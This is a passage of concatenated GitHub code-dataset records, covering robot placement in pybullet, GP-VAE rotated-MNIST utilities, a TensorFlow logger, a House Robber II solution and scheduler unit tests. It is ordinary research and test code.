continue\n\n # Complete the desired new position.\n # new_z = floor_aabb[1, 2] + (old_z - robot_aabb[0, 2])\n new_z = floor_aabb[1, 2] + (old_z - robot_aabb[0, 2])\n new_pos = np.asarray([x, y, new_z + EPS], dtype=np.float32)\n new_rot = old_rot\n # NOTE(ycho): Alternatively, sample from a random SE2 orientation:\n # new_rot = pb.getQuaternionFromEuler([0.0, 0.0, np.random.uniform(-np.pi, np.pi)])\n\n # Reject the new position if it collides with existing objects.\n if self.settings_.use_fast_aabb_in_placement:\n # NOTE(ycho): This query is conservative, so the returned objects\n # may not actually overlap with the robot. However,\n # perhaps if the object is close enough to the robot that we should\n new_aabb = robot_aabb + new_pos - old_pos\n o = pb.getOverlappingObjects(new_aabb[0], new_aabb[1],\n physicsClientId=self.sim_id)\n if o is not None:\n continue\n\n pb.resetBasePositionAndOrientation(robot_id,\n new_pos,\n new_rot,\n physicsClientId=self.sim_id)\n break\n else:\n # Actually place the robot where it would go,\n # and then check if it results in a collision.\n # Try placing the robot here now ...\n # NOTE(ycho): Since pybullet uses a default collision margin (0.04 I think?),\n # even this may be a little bit more conservative than the actual collision.\n pb.resetBasePositionAndOrientation(robot_id,\n new_pos,\n new_rot,\n physicsClientId=self.sim_id)\n col = False\n for env_id in self.env_ids_:\n cpts = pb.getClosestPoints(env_id, robot_id,\n np.inf,\n physicsClientId=self.sim_id)\n for cpt in cpts:\n if cpt[8] < 0:\n col = True\n break\n # Early exit if collision found\n if col:\n break\n # Continue searching if collision found\n if col:\n continue\n\n # All is well! break.\n break\n","repo_name":"iMSquared/imm_sim","sub_path":"src/imm/sim/env/three_d_front_env.py","file_name":"three_d_front_env.py","file_ext":"py","file_size_in_byte":17389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"32040966699","text":"import tensorflow as tf\r\nimport tensorflow_probability as tfp\r\nfrom tensorflow.python.ops import math_ops as tfmath_ops\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nfrom datetime import datetime as dt\r\nimport glob\r\nfrom matplotlib.patches import Ellipse\r\nimport shutil\r\nimport pandas as pd\r\nimport pickle\r\nimport time\r\nimport subprocess as sp\r\nimport math\r\n\r\n\r\nimport random\r\nfrom sklearn.decomposition import PCA\r\nfrom scipy import ndimage\r\nimport scipy\r\nimport seaborn as sns\r\n\r\ntfk = tfp.math.psd_kernels\r\n\r\n\r\ndef make_checkpoint_folder(base_dir, expid=None, extra=\"\"):\r\n \"\"\"\r\n Makes a folder and sub folders for pics and results\r\n Args:\r\n base_dir: the root directory where new folder will be made\r\n expid: optional extra sub dir inside base_dir\r\n \"\"\"\r\n\r\n # make a \"root\" dir to store all checkpoints\r\n # homedir = os.getenv(\"HOME\")\r\n # base_dir = homedir+\"/GPVAE_checkpoints/\"\r\n\r\n if expid is not None:\r\n base_dir = base_dir + \"/\" + expid + \"/\"\r\n\r\n if not os.path.exists(base_dir):\r\n os.makedirs(base_dir)\r\n \r\n # now make a unique folder inside the root for this experiments\r\n filenum = str(len(os.listdir(base_dir))) + \"_\"+extra+\"__on__\"\r\n\r\n T = dt.now()\r\n\r\n filetime = str(T.day)+\"_\"+str(T.month)+\"_\"+str(T.year) + \"__at__\"\r\n filetime += str(T.hour)+\"_\"+str(T.minute)+\"_\"+str(T.second)\r\n\r\n # main folder\r\n checkpoint_folder = base_dir + filenum + filetime\r\n 
os.makedirs(checkpoint_folder)\r\n\r\n # pictures folder\r\n pic_folder = checkpoint_folder + \"/pics/\"\r\n os.makedirs(pic_folder)\r\n\r\n # pickled results files\r\n res_folder = checkpoint_folder + \"/res/\"\r\n os.makedirs(res_folder)\r\n\r\n # source code\r\n src_folder = checkpoint_folder + \"/sourcecode/\"\r\n os.makedirs(src_folder)\r\n old_src_dir = os.path.dirname(os.path.abspath(__file__)) + \"/\"\r\n src_files = os.listdir(old_src_dir)\r\n print(\"\\n\\nCopying source Code to \"+src_folder)\r\n for f in src_files:\r\n if \".py\" in f:\r\n src_file = old_src_dir + f\r\n shutil.copy2(src_file, src_folder)\r\n print(src_file)\r\n print(\"\\n\")\r\n\r\n # predictions folder, for plotting purposes\r\n preds_folder = checkpoint_folder + \"/preds/\"\r\n os.makedirs(preds_folder)\r\n\r\n \r\n return checkpoint_folder + \"/\"\r\n\r\n\r\nclass pandas_res_saver:\r\n \"\"\"\r\n Takes a file and a list of col names to initialise a\r\n pandas array. Then accepts extra rows to be added\r\n and occasionally written to disc.\r\n \"\"\"\r\n def __init__(self, res_file, colnames):\r\n # reload old results frame\r\n if os.path.exists(res_file):\r\n if list(pd.read_pickle(res_file).columns)==colnames:\r\n print(\"res_file: recovered \")\r\n self.data = pd.read_pickle(res_file)\r\n self.res_file = res_file\r\n else:\r\n print(\"res_file: old exists but not same, making new \")\r\n self.res_file = res_file + \"_\" + str(time.time())\r\n self.data = pd.DataFrame(columns=colnames)\r\n else:\r\n print(\"res_file: new\")\r\n self.res_file = res_file\r\n self.data = pd.DataFrame(columns=colnames)\r\n \r\n self.ncols = len(colnames)\r\n self.colnames = colnames\r\n \r\n def __call__(self, new_data, n_steps=10):\r\n new_data = np.asarray(new_data).reshape((-1, self.ncols))\r\n new_data = pd.DataFrame(new_data, columns=self.colnames)\r\n self.data = pd.concat([self.data, new_data])\r\n\r\n if self.data.shape[0]%n_steps == 0:\r\n self.data.to_pickle(self.res_file)\r\n print(\"Saved results to file: \"+self.res_file)\r\n\r\n\r\ndef gauss_cross_entropy(mu1, var1, mu2, var2):\r\n \"\"\"\r\n Computes the element-wise cross entropy\r\n Given q(z) ~ N(z| mu1, var1)\r\n returns E_q[ log N(z| mu2, var2) ]\r\n args:\r\n mu1: mean of expectation (batch, tmax, 2) tf variable\r\n var1: var of expectation (batch, tmax, 2) tf variable\r\n mu2: mean of integrand (batch, tmax, 2) tf variable\r\n var2: var of integrand (batch, tmax, 2) tf variable\r\n returns:\r\n cross_entropy: (batch, tmax, 2) tf variable\r\n \"\"\"\r\n\r\n term0 = 1.8378770664093453 # log(2*pi)\r\n term1 = tf.log(var2)\r\n term2 = (var1 + mu1 ** 2 - 2 * mu1 * mu2 + mu2 ** 2) / var2\r\n\r\n cross_entropy = -0.5 * (term0 + term1 + term2)\r\n\r\n return cross_entropy\r\n \r\n\r\ndef generate_rotated_MNIST(save_path, N=400, nr_angles=16, valid_set_size=0.1, drop_rate=0.25, digits=[3, 6],\r\n latent_dim_object_vector=8, shuffle_data=True, seed=0):\r\n \"\"\"\r\n Generate rotated MNIST data from Casale's paper.\r\n\r\n Saves train, validation and test sets as pickle files.\r\n Each dataset is a Pyhton dictionary with keys: ['images', 'auxiliary data'].\r\n Auxiliary data consists of image id, rotation angle and PCA embedding vector.\r\n\r\n :param save_path: path for saving the generated data\r\n :param N: number of MNIST images of specified digits to use\r\n :param nr_angles: number of angles between [0, 2pi) considered\r\n :param valid_set_size: size of validation set\r\n :param drop_rate: how much images to drop\r\n :param digit: which digit to consider\r\n 
:param shuffle_data: whether or not to shuffle data. Might be important since if we pass\r\n all angles of the same digit in same batch, kernel matrices carry more information that model could exploit.\r\n Note that for Michael's extrapolatingGPVAE idea, data should not be shuffled, since there independent GPs are\r\n fitted for each image.\r\n :param latent_dim_object_vector: dimension of latent dimension of object vectors\r\n :param seed: random seed, for reproducibility\r\n \"\"\"\r\n\r\n random.seed(seed)\r\n angles = np.linspace(0, 360, nr_angles + 1)[:-1]\r\n\r\n # load MNIST data\r\n (x_train, y_train), (_, _) = tf.keras.datasets.mnist.load_data()\r\n\r\n # Rescale the images from [0,255] to the [0.0,1.0] range.\r\n x_train = x_train[..., np.newaxis] / 255.0\r\n\r\n # TODO: should MNIST images be binarized here?\r\n\r\n # filter out images with correct digit\r\n digits_df = []\r\n for digit in digits:\r\n x_train_digit = x_train[(y_train == digit)]\r\n print('Number of images with digit {}: {}'.format(digit, len(x_train_digit)))\r\n\r\n # subsample N images\r\n indices = random.sample(list(range(x_train_digit.shape[0])), N)\r\n digits_df.append(x_train_digit[indices, :, :, 0]) # (N, 28, 28)\r\n\r\n x_train = np.concatenate(digits_df)\r\n\r\n # PCA\r\n pca_df = x_train.copy().reshape((x_train.shape[0], -1))\r\n pca = PCA(n_components=latent_dim_object_vector)\r\n pca_df = pca.fit_transform(pca_df)\r\n print(\"Explained variance ratio PCA: {}\".format(pca.explained_variance_ratio_))\r\n\r\n # save pca_df to pickle (for init of object vectors)\r\n digit_ending = \"\".join([str(x) for x in digits])\r\n with open(save_path + 'pca_ov_init{}_{}.p'.format(digit_ending, latent_dim_object_vector), 'wb') as ov_init_pickle:\r\n pickle.dump(pca_df, ov_init_pickle)\r\n\r\n # rotate images\r\n def rotate_image(image, image_id, angles, pca_embedding):\r\n images = []\r\n\r\n aux_data = np.array([tuple([image_id, math.radians(angle)] + list(pca_embedding)) for angle in angles])\r\n\r\n for i in range(len(angles)):\r\n images.append(ndimage.rotate(image, angles[i], reshape=False))\r\n\r\n images = np.stack(images)\r\n images = images[..., np.newaxis]\r\n\r\n return images, aux_data\r\n\r\n images, aux_data = [], []\r\n\r\n assert len(digits) * N == x_train.shape[0]\r\n for i in range(len(digits) * N):\r\n images_rot, aux_data_i = rotate_image(x_train[i, :, :], i, angles, pca_df[i, :].copy())\r\n images.append(images_rot)\r\n aux_data.append(aux_data_i)\r\n\r\n images = np.concatenate(images) # (N * len(angles), 28, 28, 1)\r\n aux_data = np.concatenate(aux_data) # (N * len(angles), 10)\r\n\r\n # train/test and eval split\r\n images_, aux_data_, eval_images_, eval_aux_data_ = [], [], [], []\r\n N_digit = int(len(images) / len(digits))\r\n N_eval = int(N_digit * (1 - valid_set_size))\r\n for i in range(len(digits)):\r\n images_.append(images[i * N_digit:i * N_digit + N_eval])\r\n aux_data_.append(aux_data[i * N_digit:i * N_digit + N_eval])\r\n eval_images_.append(images[i * N_digit + N_eval:(i + 1) * N_digit])\r\n eval_aux_data_.append(aux_data[i * N_digit + N_eval:(i + 1) * N_digit])\r\n\r\n images, aux_data, eval_images, eval_aux_data = np.concatenate(images_), np.concatenate(aux_data_), \\\r\n np.concatenate(eval_images_), np.concatenate(eval_aux_data_)\r\n\r\n # shuffle eval data\r\n if shuffle_data:\r\n eval_idx = random.sample(list(range(len(eval_images))), len(eval_images))\r\n eval_images, eval_aux_data = eval_images[eval_idx], eval_aux_data[eval_idx]\r\n\r\n # train and test split\r\n 
test_angle = random.sample(list(angles), 1)[0]\r\n mask = (aux_data[:, 1] == math.radians(test_angle))\r\n train_images, train_aux_data, test_images, test_aux_data = images[~mask], aux_data[~mask], \\\r\n images[mask], aux_data[mask]\r\n print(\"Test angle: {}\".format(test_angle))\r\n\r\n # drop some images\r\n if shuffle_data:\r\n idx_train = random.sample(list(range(len(train_images))), int(len(train_images) * (1 - drop_rate)))\r\n idx_test = random.sample(list(range(len(test_images))), int(len(test_images) * (1 - drop_rate)))\r\n else:\r\n idx_train = list(range(int(len(train_images) * (1 - drop_rate))))\r\n idx_test = list(range(int(len(test_images) * (1 - drop_rate))))\r\n\r\n idx_train_not_in_test = list(range(int(len(train_images) * (1 - drop_rate)), len(train_images)))\r\n train_not_in_test_images = train_images[idx_train_not_in_test]\r\n train_not_in_test_aux_data = train_aux_data[idx_train_not_in_test]\r\n\r\n train_images, train_aux_data = train_images[idx_train], train_aux_data[idx_train]\r\n test_images, test_aux_data = test_images[idx_test], test_aux_data[idx_test]\r\n\r\n print('Size of training data: {}'.format(len(train_images)))\r\n print('Size of validation data: {}'.format(len(eval_images)))\r\n print('Size of test data: {}'.format(len(test_images)))\r\n\r\n if not shuffle_data:\r\n print('Size of training data without test ids: {}'.format(len(train_not_in_test_images)))\r\n\r\n # save to pickle files\r\n train_dict = {'images': train_images, 'aux_data': train_aux_data}\r\n eval_dict = {'images': eval_images, 'aux_data': eval_aux_data}\r\n test_dict = {'images': test_images, 'aux_data': test_aux_data}\r\n\r\n if not shuffle_data:\r\n train_not_in_test_dict = {'images': train_not_in_test_images, 'aux_data': train_not_in_test_aux_data}\r\n\r\n ending = \"_not_shuffled_{}.p\".format(latent_dim_object_vector) if not shuffle_data else \"_{}.p\".format(latent_dim_object_vector)\r\n ending = digit_ending + ending\r\n print(ending)\r\n\r\n with open(save_path + 'train_data' + ending, 'wb') as train_pickle:\r\n pickle.dump(train_dict, train_pickle)\r\n with open(save_path + 'eval_data' + ending, 'wb') as eval_pickle:\r\n pickle.dump(eval_dict, eval_pickle)\r\n with open(save_path + 'test_data' + ending, 'wb') as test_pickle:\r\n pickle.dump(test_dict, test_pickle)\r\n\r\n if not shuffle_data:\r\n with open(save_path + 'train_not_in_test_data' + ending, 'wb') as train_pickle:\r\n pickle.dump(train_not_in_test_dict, train_pickle)\r\n\r\n\r\ndef plot_mnist(arr, recon_arr, title, nr_images=8, seed=0):\r\n \"\"\"\r\n\r\n :param arr:\r\n :param recon_arr:\r\n :param title:\r\n :param nr_images:\r\n :param seed:\r\n :return:\r\n \"\"\"\r\n random.seed(seed)\r\n assert nr_images % 8 == 0\r\n\r\n indices = random.sample(list(range(len(arr))), nr_images)\r\n plt.figure(figsize=(10, 10*int(nr_images/8)))\r\n plt.suptitle(title)\r\n for i in range(int(nr_images*2)):\r\n plt.subplot(int(nr_images / 2), 4, i + 1)\r\n plt.xticks([])\r\n plt.yticks([])\r\n plt.grid(False)\r\n if i % 2 == 0:\r\n plt.imshow(arr[indices[i // 2]][:, :, 0], cmap='gray')\r\n plt.xlabel(\"Ground truth, id: {}\".format(indices[i // 2]))\r\n else:\r\n plt.imshow(recon_arr[indices[i // 2]][:, :, 0], cmap='gray')\r\n plt.xlabel(\"Recon image, id: {}\".format(indices[i // 2]))\r\n # plt.tight_layout()\r\n plt.draw()\r\n\r\n\r\ndef visualize_kernel_matrices(aux_data_arr, batch_size=32, N=1, K_obj_normalized=True,\r\n amplitude=1.0, length_scale=1.0):\r\n \"\"\"\r\n Visualize heatmaps of kernel matrices.\r\n\r\n :param 
aux_data_arr:\r\n :param batch_size:\r\n :param N: number of batches to visualize\r\n :param K_obj_normalized: whether or not to normalize (between -1 and 1) object kernel matrix (linear kernel)\r\n :param amplitude:\r\n :param length_scale:\r\n \"\"\"\r\n\r\n # define kernels\r\n kernel_view = tfk.ExpSinSquared(amplitude=amplitude, length_scale=length_scale, period=2 * np.pi)\r\n kernel_object = tfk.Linear()\r\n x = tf.placeholder(dtype=tf.float32)\r\n y = tf.placeholder(dtype=tf.float32)\r\n z = tf.placeholder(dtype=tf.float32)\r\n w = tf.placeholder(dtype=tf.float32)\r\n K_view = kernel_view.matrix(tf.expand_dims(x, axis=1), tf.expand_dims(y, axis=1))\r\n K_obj = kernel_object.matrix(z, w)\r\n if K_obj_normalized:\r\n obj_norm = 1 / tf.matmul(tf.math.reduce_euclidean_norm(z, axis=1, keepdims=True),\r\n tf.transpose(tf.math.reduce_euclidean_norm(z, axis=1, keepdims=True), perm=[1, 0]))\r\n K_obj = K_obj * obj_norm\r\n K_prod = K_view * K_obj\r\n\r\n # util function for heatmaps\r\n def heatmap(ax_, arr, title, vmin=0, vmax=1):\r\n ax = sns.heatmap(arr, vmin=vmin, vmax=vmax, center=0,\r\n cmap=sns.diverging_palette(20, 220, n=200),\r\n square=True, ax=ax_)\r\n ax.set_xticklabels(ax.get_xticklabels(),\r\n rotation=45,\r\n horizontalalignment='right')\r\n ax.set_title(title);\r\n\r\n for i in range(N):\r\n # generate kernel matrices\r\n batch = aux_data_arr[i * batch_size:(i + 1) * batch_size]\r\n with tf.Session() as sess:\r\n K_view_, K_obj_, K_prod_ = sess.run([K_view, K_obj, K_prod],\r\n {x: batch[:, 1], y: batch[:, 1], z: batch[:, 2:], w: batch[:, 2:]})\r\n # plot kernel matrices\r\n fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(20, 5))\r\n heatmap(axes[0], K_view_, \"View kernel. Batch: {}. Det: {}\".format(i + 1, np.linalg.det(K_view_)))\r\n heatmap(axes[1], K_obj_, \"Object kernel. Batch: {}. Det: {}\".format(i + 1, np.linalg.det(K_obj_)), vmin=-1)\r\n heatmap(axes[2], K_prod_, \"Product kernel. Batch: {}. Det: {}\".format(i + 1, np.linalg.det(K_prod_)), vmin=-1)\r\n plt.show()\r\n\r\n\r\ndef import_rotated_mnist(MNIST_path, ending, batch_size, digits=\"3\", N_t=None):\r\n \"\"\"\r\n\r\n Support for loading of data and batching via tf.data.Dataset API.\r\n\r\n :param MNIST_path:\r\n :param ending:\r\n :param batch_size:\r\n :param N_t: How many angels in train set for each image in test set\r\n (since reGPVAE implementation is based on not_shuffled data).\r\n\r\n :return:\r\n \"\"\"\r\n\r\n # TODO: here we load entire data in the memory. 
For MNIST that is fine, for larger datasets will have to\r\n # implement it in more efficient way\r\n\r\n # train data\r\n train_data_dict = pickle.load(open(MNIST_path + 'train_data' + ending, 'rb'))\r\n if N_t is not None:\r\n flatten = lambda l: [item for sublist in l for item in sublist]\r\n digit_mask = [True] * N_t + [False] * (15 - N_t)\r\n\r\n mask = [random.sample(digit_mask, len(digit_mask)) for _ in range(int(len(train_data_dict['aux_data'])/15))]\r\n mask = flatten(mask)\r\n train_data_dict['images'] = train_data_dict['images'][mask]\r\n train_data_dict['aux_data'] = train_data_dict['aux_data'][mask]\r\n\r\n # add train images without test angles\r\n if N_t < 15:\r\n train_not_in_test_data_dict = pickle.load(open(MNIST_path + 'train_not_in_test_data' + ending, 'rb'))\r\n\r\n n = int(len(digits) * 270 * (15 - N_t) / N_t) * N_t\r\n\r\n mask = [random.sample(digit_mask, len(digit_mask)) for _ in range(int(len(train_not_in_test_data_dict['aux_data']) / 15))]\r\n mask = flatten(mask)\r\n\r\n train_data_dict['images'] = np.concatenate((train_data_dict['images'],\r\n train_not_in_test_data_dict['images'][mask][:n, ]), axis=0)\r\n train_data_dict['aux_data'] = np.concatenate((train_data_dict['aux_data'],\r\n train_not_in_test_data_dict['aux_data'][mask][:n, ]), axis=0)\r\n\r\n train_data_images = tf.data.Dataset.from_tensor_slices(train_data_dict['images'])\r\n train_data_aux_data = tf.data.Dataset.from_tensor_slices(train_data_dict['aux_data'])\r\n train_data = tf.data.Dataset.zip((train_data_images, train_data_aux_data)).batch(batch_size)\r\n\r\n # eval data\r\n eval_batch_size_placeholder = tf.compat.v1.placeholder(dtype=tf.int64, shape=())\r\n eval_data_dict = pickle.load(open(MNIST_path + 'eval_data' + ending, 'rb'))\r\n eval_data_images = tf.data.Dataset.from_tensor_slices(eval_data_dict['images'])\r\n eval_data_aux_data = tf.data.Dataset.from_tensor_slices(eval_data_dict['aux_data'])\r\n eval_data = tf.data.Dataset.zip((eval_data_images, eval_data_aux_data)).batch(eval_batch_size_placeholder)\r\n\r\n # test data\r\n test_batch_size_placeholder = tf.compat.v1.placeholder(dtype=tf.int64, shape=())\r\n test_data_dict = pickle.load(open(MNIST_path + 'test_data' + ending, 'rb'))\r\n test_data_images = tf.data.Dataset.from_tensor_slices(test_data_dict['images'])\r\n test_data_aux_data = tf.data.Dataset.from_tensor_slices(test_data_dict['aux_data'])\r\n test_data = tf.data.Dataset.zip((test_data_images, test_data_aux_data)).batch(test_batch_size_placeholder)\r\n\r\n # init iterator\r\n iterator = tf.data.Iterator.from_structure(train_data.output_types, train_data.output_shapes)\r\n training_init_op = iterator.make_initializer(train_data)\r\n eval_init_op = iterator.make_initializer(eval_data)\r\n test_init_op = iterator.make_initializer(test_data)\r\n\r\n return iterator, training_init_op, eval_init_op, test_init_op, \\\r\n train_data_dict, eval_data_dict, test_data_dict, eval_batch_size_placeholder, test_batch_size_placeholder\r\n\r\n\r\ndef print_trainable_vars(vars):\r\n total_parameters = 0\r\n print(\"\\n\\nTrainable variables:\")\r\n for v in vars:\r\n print(v)\r\n shape = v.get_shape()\r\n var_params = 1\r\n for dim in shape:\r\n var_params *= dim.value\r\n total_parameters += var_params\r\n print(\"Number of train params: {}\".format(total_parameters))\r\n\r\n\r\ndef latent_samples_VAE_full_train(train_images, vae, clipping_qs=False):\r\n \"\"\"\r\n Get latent samples for training data. 
For t-SNE plots :)\r\n\r\n :param train_images:\r\n :param vae:\r\n :param clipping_qs:\r\n :return:\r\n \"\"\"\r\n\r\n # ENCODER NETWORK\r\n qnet_mu, qnet_var = vae.encode(train_images)\r\n\r\n # clipping of VAE posterior variance\r\n if clipping_qs:\r\n qnet_var = tf.clip_by_value(qnet_var, 1e-3, 10)\r\n\r\n # SAMPLE\r\n epsilon = tf.random.normal(shape=tf.shape(qnet_mu), dtype=vae.dtype)\r\n latent_samples = qnet_mu + epsilon * tf.sqrt(qnet_var)\r\n\r\n return latent_samples\r\n\r\n\r\nif __name__==\"__main__\":\r\n\r\n # generate_init_inducing_points(\"MNIST data/train_data3.p\", PCA=False)\r\n\r\n # ============= generating rotated MNIST data =============\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3, 6])\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[1, 3, 6, 7, 9])\r\n # generate_rotated_MNIST(\"MNIST data/\")\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[6])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[3])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[3, 6])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[1, 3, 6, 7, 9])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=True, digits=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=4)\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=16)\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=32)\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=64)\r\n generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=24)\r\n\r\n","repo_name":"metodj/FGP-VAE","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":20978,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"13723476356","text":"import tensorflow as tf\nimport numpy as np\nimport io\nimport PIL.Image\n\n\nclass Logger(object):\n def __init__(self, log_dir):\n self.writer = tf.summary.create_file_writer(log_dir)\n\n def scalar_summary(self, tag, value, step):\n with self.writer.as_default():\n tf.summary.scalar(tag, value, step=step)\n\n def image_summary(self, tag, images, step):\n with self.writer.as_default():\n image_summaries = []\n for i, img in enumerate(images):\n # Convert image to PIL Image object\n pil_img = PIL.Image.fromarray(img)\n\n # Create a BytesIO object to store the image data\n image_buffer = io.BytesIO()\n pil_img.save(image_buffer, format='PNG')\n\n # Create an Image Tensor\n img_tensor = tf.image.decode_image(image_buffer.getvalue(), channels=4)\n\n # Add image summary\n image_summaries.append(tf.summary.image(f'{tag}/{i}', [img_tensor], step=step))\n\n tf.summary.experimental.write_raw_pb(tf.summary.experimental.serialize_many_summary(image_summaries), step=step)\n\n def histo_summary(self, tag, values, step, bins=1000):\n with self.writer.as_default():\n tf.summary.histogram(tag, values, step=step, buckets=bins)","repo_name":"AbhishekKaushikCV/SEGMENT3D","sub_path":"train/common/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21308396624","text":"class Solution:\n def rob(self, nums: List[int]) -> int:\n if len(nums) <= 3:\n return 
max(nums)\n \n def houseRobbed(index, bound):\n if index > bound:\n return 0\n \n if index in memo:\n return memo[index]\n \n memo[(index)] = max(nums[index] + houseRobbed(index + 2, bound), houseRobbed( index + 1, bound))\n return memo[(index)]\n \n memo = {}\n FirstHouseRobbed = houseRobbed(0, len(nums) - 2)\n \n memo.clear()\n LastHouseRobbed = houseRobbed(1, len(nums) - 1)\n \n return max(FirstHouseRobbed, LastHouseRobbed)\n ","repo_name":"YeabAM/A2SV","sub_path":"0213-house-robber-ii/0213-house-robber-ii.py","file_name":"0213-house-robber-ii.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"29093498821","text":"\"\"\"Unit tests for sched_funcs.py decorators\"\"\"\n\nimport os\nimport sys\nimport time\nimport datetime\nimport logging\nimport functools\nimport unittest\n\nimport mock\nimport pytest\nimport schedule\nfrom schedule import every\n\nfrom node_tools.helper_funcs import NODE_SETTINGS\nfrom node_tools.helper_funcs import AttrDict\nfrom node_tools.helper_funcs import send_announce_msg\nfrom node_tools.network_funcs import echo_client\nfrom node_tools.network_funcs import get_net_cmds\nfrom node_tools.network_funcs import run_net_cmd\nfrom node_tools.network_funcs import send_wedged_msg\nfrom node_tools.sched_funcs import catch_exceptions\nfrom node_tools.sched_funcs import run_until_success\nfrom node_tools.sched_funcs import show_job_tags\n\ntry:\n from datetime import timezone\n utc = timezone.utc\nexcept ImportError:\n from schedule.timezone import UTC\n utc = UTC()\n\n\ndef make_mock_job(name=None):\n job = mock.Mock()\n job.__name__ = name or 'job'\n return job\n\n\nclass mock_datetime(object):\n \"\"\"\n Monkey-patch datetime for predictable results\n \"\"\"\n def __init__(self, year, month, day, hour, minute, second=0):\n self.year = year\n self.month = month\n self.day = day\n self.hour = hour\n self.minute = minute\n self.second = second\n\n def __enter__(self):\n class MockDate(datetime.datetime):\n @classmethod\n def today(cls):\n return cls(self.year, self.month, self.day)\n\n @classmethod\n def now(cls, tz=None):\n return cls(self.year, self.month, self.day,\n self.hour, self.minute, self.second).replace(tzinfo=tz)\n\n self.original_datetime = datetime.datetime\n datetime.datetime = MockDate\n\n def __exit__(self, *args, **kwargs):\n datetime.datetime = self.original_datetime\n\n\nclass ScheduleTests(unittest.TestCase):\n def setUp(self):\n self.bin_dir = os.path.join(os.getcwd(), 'test/fpnd/')\n schedule.clear()\n\n def test_job_info(self):\n with mock_datetime(2010, 1, 6, 14, 16):\n mock_job = make_mock_job(name='info_job')\n info_job = every().minute.do(mock_job, 1, 7, 'three')\n schedule.run_all()\n assert len(schedule.jobs) == 1\n assert schedule.jobs[0] == info_job\n assert repr(info_job)\n assert info_job.job_name is not None\n s = info_job.info\n assert 'info_job' in s\n assert 'three' in s\n assert '2010' in s\n assert '14:16' in s\n\n def test_cancel_job(self):\n @show_job_tags()\n def stop_job():\n return schedule.CancelJob\n mock_job = make_mock_job()\n\n every().second.do(stop_job)\n mj = every().second.do(mock_job)\n assert len(schedule.jobs) == 2\n\n schedule.run_all()\n assert len(schedule.jobs) == 1\n assert schedule.jobs[0] == mj\n\n schedule.cancel_job('Not a job')\n assert len(schedule.jobs) == 1\n schedule.default_scheduler.cancel_job('Not a job')\n assert len(schedule.jobs) == 1\n\n schedule.cancel_job(mj)\n assert len(schedule.jobs) == 
0\n\n def test_run_net_cmd_sup(self):\n cmd_up0 = get_net_cmds(self.bin_dir, 'fpn0', True)\n cmd_up1 = get_net_cmds(self.bin_dir, 'fpn1', True)\n\n every().second.do(run_net_cmd, cmd_up0).tag('net-change')\n every().second.do(run_net_cmd, cmd_up1).tag('net-change')\n\n self.assertEqual(len(schedule.jobs), 2)\n\n schedule.run_all(0, 'net-change')\n self.assertEqual(len(schedule.jobs), 0)\n\n def test_run_net_cmd_sdown(self):\n NODE_SETTINGS['route_dns_53'] = True\n NODE_SETTINGS['private_dns_only'] = True\n\n cmd_down0 = get_net_cmds(self.bin_dir, 'fpn0', False)\n cmd_down1 = get_net_cmds(self.bin_dir, 'fpn1', False)\n\n every().second.do(run_net_cmd, cmd_down0).tag('net-change')\n every().second.do(run_net_cmd, cmd_down1).tag('net-change')\n self.assertEqual(len(schedule.jobs), 2)\n\n schedule.run_all(0, 'net-change')\n self.assertEqual(len(schedule.jobs), 2)\n\n schedule.run_all(0, 'net-change')\n schedule.run_all(0, 'net-change')\n self.assertEqual(len(schedule.jobs), 0)\n\n\nclass SendMsgTest(unittest.TestCase):\n \"\"\"\n Note the input for this test case is just nodeState.fpn_id and\n mainly tests the warning generated by the nanomsg timeout.\n \"\"\"\n def setUp(self):\n super(SendMsgTest, self).setUp()\n from node_tools import state_data as st\n\n schedule.clear()\n self.default_state = st.defState\n self.state = st.fpnState\n self.cfg = st.cfg_msgs\n self.addr = '127.0.0.1'\n\n def tearDown(self):\n from node_tools import state_data as st\n\n # defState = s.defState\n\n st.fpnState = self.default_state\n super(SendMsgTest, self).tearDown()\n\n def test_send_echo_no_responder(self):\n\n nodeState = AttrDict.from_nested_dict(self.state)\n fpn_id = nodeState.fpn_id\n # expected command result is a list so the return\n # result for echo_client() is actually None\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n send_announce_msg(fpn_id, None)\n schedule.run_all()\n\n with self.assertWarns(RuntimeWarning) as err:\n result = echo_client(fpn_id, self.addr)\n # print(result)\n self.assertIs(result, None)\n\n def test_send_cfg_no_responder(self):\n\n nodeState = AttrDict.from_nested_dict(self.state)\n fpn_id = nodeState.fpn_id\n # expected command result is a list so the return\n # result for echo_client() is actually None\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n send_announce_msg(fpn_id, None, send_cfg=True)\n schedule.run_all()\n\n with self.assertWarns(RuntimeWarning) as err:\n result = echo_client(fpn_id, self.addr, send_cfg=True)\n # print(result)\n self.assertIs(result, None)\n\n def test_send_wedged_no_responder(self):\n\n nodeState = AttrDict.from_nested_dict(self.state)\n fpn_id = nodeState.fpn_id\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n send_wedged_msg()\n 